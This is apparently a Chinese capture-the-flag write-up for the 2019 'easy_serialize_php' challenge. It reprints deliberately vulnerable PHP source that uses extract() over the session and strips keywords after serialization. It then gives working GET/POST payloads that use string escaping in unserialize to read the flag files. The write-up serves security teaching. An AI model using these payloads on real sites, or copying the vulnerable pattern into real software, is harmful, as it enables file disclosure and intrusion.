[安洵杯 2019]easy_serialize_php 1
首先打开题目根据提示得到源码:
<?php
$function = @$_GET['f'];
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
if($_SESSION){
unset($_SESSION);
}
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST);
if(!$function){
echo '<a href="index.php?f=highlight_file">source_code</a>';
}
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
$serialize_info = filter(serialize($_SESSION));
if($function == 'highlight_file'){
highlight_file('index.php');
}else if($function == 'phpinfo'){
eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
}
对代码进行审计
发现我们能利用的点就是:
这文件读取,但我们要读什么呢?
根据提示看一下phpinfo
发现可以读取的文件:
回到源码
继续审计,要利用文件读取必修绕过
这个是在extract()对数组赋值之后进行的赋值
我们传入$_SESSION数组可以覆盖前面的值
但是不能覆盖这里img的值
发现有过滤字符替换为空:
可以利用字符逃逸
首先构造数组反序列化:
可以看到,我们要把function的值溢出来作为数组的值,
就可以通过user的值的长度来把:";s:8:“function”;s:73:
作为user的值,然后把后面的:
s:8:“function”;s:10:“show_image”;s:3:“img”;s:20:“ZDBnM19mMWFnLnBocA==”;}
做为新的值,
也就是user的值的长度要等于";s:8:“function”;s:73:的长度22个字符
还是能被替换为空的字符也就是:4个flag加2个php
刚好22位:flagflagflagflagphpphp
看见刚好22位
加上过滤函数试试:
发现字符:";s:8:“function”;s:73:
被做为user的值,function的值逃逸做为数组的值
这样在";}后面的字符不会被作为反序列化的字符
就会把之前img的值抛弃
读取d0g3_f1ag.php的值:
playload:
GET:
?f=show_image
POST:
_SESSION[user]=flagflagflagflagphpphp&_SESSION[function]=;s:8:"function";s:10:"show_image";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
请求查看源码
得到:
根据同样的原理读取d0g3_fllllllag
playload:
GET:
?f=show_image
POST:
_SESSION[user]=flagflagflagflagphpphp&_SESSION[function]=;s:8:"function";s:10:"show_image";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
得到flag:
参考博客: